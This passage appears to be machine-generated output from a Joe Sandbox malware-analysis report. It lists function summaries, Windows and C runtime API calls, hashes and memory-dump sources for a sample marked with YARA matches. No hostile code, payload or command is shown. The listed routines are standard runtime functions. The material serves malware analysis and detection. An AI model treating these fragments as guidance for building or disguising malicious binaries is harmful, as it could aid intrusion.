                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID: yA
                    • API String ID: 1182035702-575552531
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: c1bac3c45397f19ff15f1c8079396faaf703d4cc50a356fec0ea894be16b9f48
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: F421D3B0D04209DADF24DFA5C8416EEBBF0AF04314F20052FE551A62D2E77D8ACACB59
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: f974d34388bfc7b8d7e55b3d0da2831ba7f624eda70d1dd885c991811fc1ff03
                    • Instruction ID: edd3bb4821e0e334992581e128a7ea4f1eec55af6bbbcf2d157306d706246d1a
                    • Opcode Fuzzy Hash: f974d34388bfc7b8d7e55b3d0da2831ba7f624eda70d1dd885c991811fc1ff03
                    • Instruction Fuzzy Hash: 84510971A04242BFEF24AF66DC40A6E77A4EF01315F24416FEB10972A1EB72B541CB62
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction ID: e6aeac42739e6ab7cd66bc4c883525bdaa8889de24cd7337cf9c056b5eacb4ab
                    • Opcode Fuzzy Hash: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction Fuzzy Hash: 5A514871905302AFDF21AF77C842A6E7BA4AF0D314F14616FE5209B2C1EB7D89018B5D
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431C50
                      • Part of subcall function 00431F1F: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00431998), ref: 00431F2F
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431C65
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C74
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431D38
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID: pContext$switchState
                    • API String ID: 1312548968-2660820399
                    • Opcode ID: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction ID: 28a58a2465d583a026d35ed57488f6c87d6b755b90b9bc2941db00793719cab4
                    • Opcode Fuzzy Hash: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction Fuzzy Hash: 2531D835A00214ABCF04EF65C885A6E7379BF5C314F20556BED11A73A2DB78EE05CB98
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 044EEB4F
                      • Part of subcall function 044EE8BC: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 044EE8EF
                      • Part of subcall function 044EE8BC: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 044EE911
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EEBCC
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 044EEBD8
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 044EEBE7
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 044EEBF1
                    • Concurrency::location::_Assign.LIBCMT ref: 044EEC25
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044EEC2D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction ID: 4a261eb059207c826ab15e0d03394258bd3fd17000b31e26a7836b2fd86ecda5
                    • Opcode Fuzzy Hash: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction Fuzzy Hash: FB416C39A00214DFDF05EF66C484BAEB7B5BF48315F2480AADD499B382DB30A941CF91
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E688
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E6AA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E965
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E971
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction ID: 9694649e30401d41b72234d07e7418f217b5c7827242a2584a4def143e057733
                    • Opcode Fuzzy Hash: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction Fuzzy Hash: C9416B79A002149FCF04EF65D484BADB7B5FF48314F5480AAED499B382CB38AD41CB95
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 0-537541572
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: 21de61e756f92fc94f430986694573f373faed14fbe57d2d8d79661cf7d5140c
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: D721D735A01714ABCB228A659C49B2F3754DF09760F2413A2FE05A73A1D738ED0086DD
                    APIs
                    • __EH_prolog3.LIBCMT ref: 044DF1DD
                    • _SpinWait.LIBCONCRT ref: 044DF233
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 044DF23F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 044DF258
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 044DF286
                    • Concurrency::Context::Block.LIBCONCRT ref: 044DF2A8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: e31bab5da97af1705a0a7a1438d2b62b90efd2a870d25c7b40b519c3c9aac380
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: 93218374D002198AEF34EFA4C8656EEF7F0AF05314F60051FD162A6291EBB2A648CB91
                    APIs
                      • Part of subcall function 044FF3AD: _free.LIBCMT ref: 044FF3D2
                    • _free.LIBCMT ref: 044FF433
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FF43E
                    • _free.LIBCMT ref: 044FF449
                    • _free.LIBCMT ref: 044FF49D
                    • _free.LIBCMT ref: 044FF4A8
                    • _free.LIBCMT ref: 044FF4B3
                    • _free.LIBCMT ref: 044FF4BE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: a51e90d269a43d1039541b0fe2c6b10ff45749c2c484b6c7e363b11b8d0050ee
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: B7111A71A40B04BAED30BBB3CC06FCB7B9CDF01704F40481BB7A966052EE65B5098651
                    APIs
                      • Part of subcall function 0043F146: _free.LIBCMT ref: 0043F16B
                    • _free.LIBCMT ref: 0043F1CC
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F1D7
                    • _free.LIBCMT ref: 0043F1E2
                    • _free.LIBCMT ref: 0043F236
                    • _free.LIBCMT ref: 0043F241
                    • _free.LIBCMT ref: 0043F24C
                    • _free.LIBCMT ref: 0043F257
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: 534b49149ef6fe1f5aaee1d96a2c981c71fb821ccbb97e781409d237b4b487e5
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: 6811A271980B04EADA31FBB2CC47FCBB7BD5F48708F40182EB29D6A052D63CB8188655
                    APIs
                    • GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,044E3F5D), ref: 044DFDF6
                    • GetProcAddress.KERNEL32(00000000,0045177C), ref: 044DFE04
                    • GetProcAddress.KERNEL32(00000000,00451794), ref: 044DFE12
                    • GetProcAddress.KERNEL32(00000000,004517AC), ref: 044DFE40
                    • GetLastError.KERNEL32(?,?,?,044E3F5D), ref: 044DFE5B
                    • GetLastError.KERNEL32(?,?,?,044E3F5D), ref: 044DFE67
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044DFE7D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID:
                    • API String ID: 1654681794-0
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: da81407d3e17d7dc5198c700ae482ec3f776c76d7517841dc4e8f81b74108506
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: 57018C35500715ABBB107BB6BC59F7B37ACAD04756714053BF902D12A3EEB8F4084769
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 044D7188
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044D71D9
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044D71E9
                    • __Mtx_unlock.LIBCPMT ref: 044D728C
                    • __Mtx_unlock.LIBCPMT ref: 044D7392
                    • __Mtx_unlock.LIBCPMT ref: 044D73CD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction ID: 21fed4668c6c5810863861bcdac14c39476edbbe1ef2ad5a9eae2d7ab512cf86
                    • Opcode Fuzzy Hash: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction Fuzzy Hash: 8DC19D719002449BEF21DFA5C964BAFBBA8AF05308F04456FE81697782EB75B904CB61
                    APIs
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    • __Mtx_unlock.LIBCPMT ref: 00416F21
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F72
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F82
                    • __Mtx_unlock.LIBCPMT ref: 00417025
                    • __Mtx_unlock.LIBCPMT ref: 0041712B
                    • __Mtx_unlock.LIBCPMT ref: 00417166
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
                    • String ID:
                    • API String ID: 95294986-0
                    • Opcode ID: 39c911b2a8a9e049dca101b223586876e9297667e17adb2483760015ee0286f2
                    • Instruction ID: 57ef224f82db242419d5894fb4a60db898c918c1b4a24625dce6041fff2ac3f1
                    • Opcode Fuzzy Hash: 39c911b2a8a9e049dca101b223586876e9297667e17adb2483760015ee0286f2
                    • Instruction Fuzzy Hash: 83C1F271A043089BDB20DFB0C945BEBBBF4AF05304F10456FE81693782EB79A984CB59
                    APIs
                    • GetConsoleCP.KERNEL32(?,044C89D7,00000000), ref: 04500011
                    • __fassign.LIBCMT ref: 045001F0
                    • __fassign.LIBCMT ref: 0450020D
                    • WriteFile.KERNEL32(?,044C89D7,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04500255
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04500295
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04500341
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 8530c6ceefdeccb30471b16bb60c9c51f20c6026f3536671e5578c65a8ea39d2
                    • Instruction ID: 42a97f661f06742a109aee5c89802768f56550a5af893295f010b98bfced19dc
                    • Opcode Fuzzy Hash: 8530c6ceefdeccb30471b16bb60c9c51f20c6026f3536671e5578c65a8ea39d2
                    • Instruction Fuzzy Hash: D2D1C275D002599FDF15CFE8E880AEDBBB5FF48314F18416AE855BB281E730A942DB50
                    APIs
                    • GetConsoleCP.KERNEL32(?,00408770,00000000), ref: 0043FDAA
                    • __fassign.LIBCMT ref: 0043FF89
                    • __fassign.LIBCMT ref: 0043FFA6
                    • WriteFile.KERNEL32(?,00408770,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FFEE
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0044002E
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004400DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction ID: 5c7093ca26383f089595d5279c1be1ab1822dbd5e540b6b74e9a9434c58314bd
                    • Opcode Fuzzy Hash: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction Fuzzy Hash: 2ED1CD71D002589FDF15CFA8D880AEEBBB5BF49304F28416AE855FB342D635AD06CB58
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 044EEC96
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044EEC9E
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EECC8
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 044EECD1
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044EED54
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044EED5C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: b04ff3b729f6daa25a328925403cde61ec0f92a3bd9b8fadabed06a48426827d
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: E1412B79A00619ABDF09DF66C454A7DB7B5FF88316F10816AE406AB791CB34FE01CB81
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 0042EA2F
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042EA37
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EA61
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042EA6A
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EAED
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042EAF5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: 1f3a1950eff8c09013561670095c22540fa8b87dd5baeeb1554441bdcab44dd9
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: 4A418339B00619AFCF08DF65D454AADBBB5FF48310F40815AE406A7391CB74AD01CF85
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0041EDFD
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EE27
                      • Part of subcall function 0041F4ED: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F50A
                    • __alloca_probe_16.LIBCMT ref: 0041EE63
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041EEA4
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EED6
                    • __freea.LIBCMT ref: 0041EEFC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 1319684358-0
                    • Opcode ID: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction ID: 07282ca70093aa5fae6e1acffc276a069bf1d2a43c8646ebc404eb48b5e248eb
                    • Opcode Fuzzy Hash: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction Fuzzy Hash: 14319075A002058FDB14DFAAC9415EEB7F5AF08314F24406FE805E7351DB389E86CBA9
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 044EA3E0
                      • Part of subcall function 044EB8D7: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 044EB926
                    • GetCurrentThread.KERNEL32 ref: 044EA3EA
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 044EA3F6
                      • Part of subcall function 044E06FF: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 044E0711
                      • Part of subcall function 044E0B8B: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 044E0B92
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 044EA439
                      • Part of subcall function 044EB889: SetEvent.KERNEL32(?,?,044EA43E,044EB1D2,00000000,?,00000000,044EB1D2,00000004,044EB87E,?,00000000,?,?,00000000), ref: 044EB8CD
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 044EA442
                      • Part of subcall function 044EAEB8: __EH_prolog3.LIBCMT ref: 044EAEBF
                      • Part of subcall function 044EAEB8: List.LIBCONCRT ref: 044EAEEE
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 044EA452
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 2908504212-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: e2fe48c555100365415a79d1f93463aa0237ebfb4e4fa0c432cf6fb6caa63f8e
                    • Opcode Fuzzy Hash: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction Fuzzy Hash: 4821D931900B109FDF25EF66C9908BBB3F8FF48209700491EE942A7761DB70B805CBA1
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A179
                      • Part of subcall function 0042B670: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B6BF
                    • GetCurrentThread.KERNEL32 ref: 0042A183
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A18F
                      • Part of subcall function 00420498: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 004204AA
                      • Part of subcall function 00420924: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042092B
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A1D2
                      • Part of subcall function 0042B622: SetEvent.KERNEL32(?,?,0042A1D7,0042AF6B,00000000,?,00000000,0042AF6B,00000004,0042B617,?,00000000,?,?,00000000), ref: 0042B666
                    • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A1DB
                      • Part of subcall function 0042AC51: List.LIBCONCRT ref: 0042AC87
                    • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A1EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
                    • String ID:
                    • API String ID: 318399070-0
                    • Opcode ID: e8a399636c21c93f54abecb38cd00bd2a0cdd3abe99d6541657663b6aa6b27b5
                    • Instruction ID: fe86043d0ec5758fdeb7fa1791ef53b29c71cd57ba806e603e01c4068b965251
